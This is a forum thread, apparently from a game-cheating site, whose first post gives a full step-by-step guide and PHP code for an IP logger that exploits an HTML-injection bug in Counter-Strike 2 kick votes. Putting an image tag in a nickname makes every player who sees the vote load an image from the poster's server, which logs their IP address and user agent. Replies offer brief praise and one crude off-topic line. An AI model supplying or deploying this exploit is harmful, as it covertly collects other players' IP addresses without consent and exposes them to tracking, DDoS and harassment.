Results 1 to 3 of 3
  1. #1
    svyanov's Avatar
    Join Date
    Jan 2016
    Gender
    male
    Posts
    7
    Reputation
    10
    Thanks
    0
    My Mood
    Fine

    Cool CS 2 IP Logger (Kick-Vote HTML Bug)




    You need:
    • Hosting
    • Domain
    • PHP


    Our domain will be "example.com"

    Create 2 files:
    • img.php
    • visitors.php


    img.php:
    Code:
    <?
    	header("Content-type: image/png");
    
    
    	readfile("img.gif");
    	$d = json_encode($_REQUEST);
    	$line = date('Y-m-d H:i:s') . " - $_SERVER[REMOTE_ADDR] - $_SERVER[HTTP_USER_AGENT] - $d";
    	file_put_contents('visitors.log', $line . PHP_EOL, FILE_APPEND);
    ?>
    visitors.php:
    Code:
    <h2>Code to catch IP: </h2>
    <p><textarea readonly='true' style='width: 500px; height: 150px;'><br><img src="https://example.com/img.php" style="max-width: 100%;"><br><br><br><br><br></textarea></p>
    <br><br>
    <?
    	echo str_replace("\n", '<br>', file_get_contents('visitors.log'));
    ?>
    also upload any picture/gif with filename "img.gif", it will be displayed for players.
    After uploading, visit example.com/visitors.php , you will see code to set for your nickname.
    Ask your friend or somebody else to vote-kick you, after that refresh example.com/visitors.php page and you will see IP of every player who see GIF.

  2. #2
    triicksterr's Avatar
    Join Date
    Apr 2015
    Gender
    male
    Posts
    1
    Reputation
    10
    Thanks
    0
    Very Noice

  3. #3
    Miniboris's Avatar
    Join Date
    Jul 2010
    Gender
    male
    Location
    70 65 6e 69 73
    Posts
    322
    Reputation
    70
    Thanks
    34
    My Mood
    Psychedelic
    Sounds cool
    How to guide on anal sex:

Similar Threads

  1. Need help in Kick Voting Hack ?!
    By aladin111 in forum Crossfire Coding Help & Discussion
    Replies: 27
    Last Post: 02-06-2013, 09:37 PM
  2. New Kick Voting System for CF EU!
    By I_want_cheat in forum CrossFire Europe Discussions
    Replies: 10
    Last Post: 12-28-2012, 07:38 AM
  3. [Preview] ghost magneto with anti kick vote PBPH
    By jablay in forum Point Blank Hacks
    Replies: 7
    Last Post: 09-13-2011, 09:58 AM
  4. Kick Voting
    By Takari in forum CrossFire Discussions
    Replies: 28
    Last Post: 03-24-2011, 05:34 AM
  5. OMG Z8games delete kick voting ...
    By ToJaMleko in forum CrossFire Discussions
    Replies: 21
    Last Post: 02-04-2011, 12:31 PM

Tags for this Thread